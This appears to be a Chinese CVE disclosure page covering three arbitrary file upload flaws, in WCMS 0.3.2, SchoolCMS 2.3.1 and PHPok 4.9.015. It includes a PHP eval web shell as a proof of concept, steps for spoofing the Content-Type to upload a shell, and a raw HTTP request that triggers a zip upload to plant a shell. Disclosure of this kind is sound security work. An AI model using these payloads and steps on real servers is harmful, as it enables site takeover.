CVE中文申请站

CVE-2019-11377:WCMS v0.3.2存在任意文件上传漏洞

一、漏洞摘要

漏洞名称: WCMS v0.3.2存在任意文件上传漏洞
上报日期: 2019-04-04
漏洞发现者: Yu Yang
产品首页: http://wcms.space/
软件链接: https://github.com/vedees/wcms
版本: v0.3.2
CVE编号: CVE-2019-11377


二、漏洞概述

在代码层上进行分析,发现该位置的上传功能,虽然建立有文件上传的白名单,但是并没有过滤掉充满风险的后缀(比如php)
1.png

三、利用方法

1.使用上传功能,在该CMS后台的 developer/finder模块
2.png
2.我们可以通过这个上传功能,上传任意后缀的文件到网站服务器上,这就导致攻击者可以上传恶意代码到服务器,以达到getshell的目的
3.png
POC(2.php):
<?php @eval($_POST[c]);?>
4.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/208/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11377
exploit-db:发布中

CVE-2019-9181:SchoolCMS v2.3.1后台任意文件上传漏洞

一、漏洞摘要

漏洞名称: SchoolCMS v2.3.1后台任意文件上传漏洞
上报日期: 2019-02-25
漏洞发现者: 鹦鹉
产品首页: http://www.schoolcms.org/
软件链接: http://www.schoolcms.org/
版本: v2.3.1
CVE编号: CVE-2019-9181


二、漏洞概述

SchoolCMS是一套基于ThinkPHP框架的开源学校教务管理系统。该系统包括学生管理、成绩管理和教师管理等。
SchoolCMS 2.3.1版本中存在任意文件上传漏洞,可在后台网站logo上传处通过自定义的Content-Type控制上传文件的后缀,最终getshell。

三、利用方法

找到漏洞触发点:站点设置 > 选择网站logo
上传小马
1.png
抓包修改Content-Type:image/php
2.png
3.png
上传成功,找到上传php文件的地址
4.png
php代码执行
5.png
将用于验证的phpinfo信息改为小马可getshell

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/125/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9181
exploit-db:发布中

CVE-2018-19562:PHPok 4.9.015存在任意文件上传漏洞

一、漏洞摘要

漏洞名称: PHPok 4.9.015存在任意文件上传漏洞
上报日期: 2018-11-25
漏洞发现者: F0rmat
产品首页: https://www.phpok.com/
软件链接: https://www.phpok.com/24489.html
版本: 4.9.015
CVE编号: CVE-2018-19562


二、漏洞概述

该漏洞存在于“登录后台>程序升级->压缩包升级”
1.png
编辑一个测试文件phpinfo.php,压缩为phpinfo.zip上传。
2.png
把shell生成在主目录下面
3.png

三、利用代码

exp代码如下:
解压文件操作如下。

GET /admin.php?c=update&f=unzip&zipfile=_cache%2F8c9ae663e9d6ce4f.zip&_=1533515826187 HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
request_type: ajax
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Referer: http://127.0.0.1/admin.php?c=update&f=zip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: hd_sid=aZY7Qf; hd_auth=f0c7B2JXp7hhumOhqeqELbZ5FJA3C%2FW2AKt4di3duYf1l5T%2BbkCMPFkWus2WrHfUg2Z8np8oM4VygPGWolgu; PHPSESSION=h4l9gblfbhu85v6sl543egc5d1
Connection: close


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/87/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19562
exploit-db:发布中